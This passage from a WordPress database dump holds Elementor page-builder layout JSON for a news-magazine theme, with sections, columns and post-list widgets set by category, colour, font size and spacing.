ticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1082,403,'_elementor_version','0.4'),(1084,404,'_elementor_edit_mode','builder'),(1085,404,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"3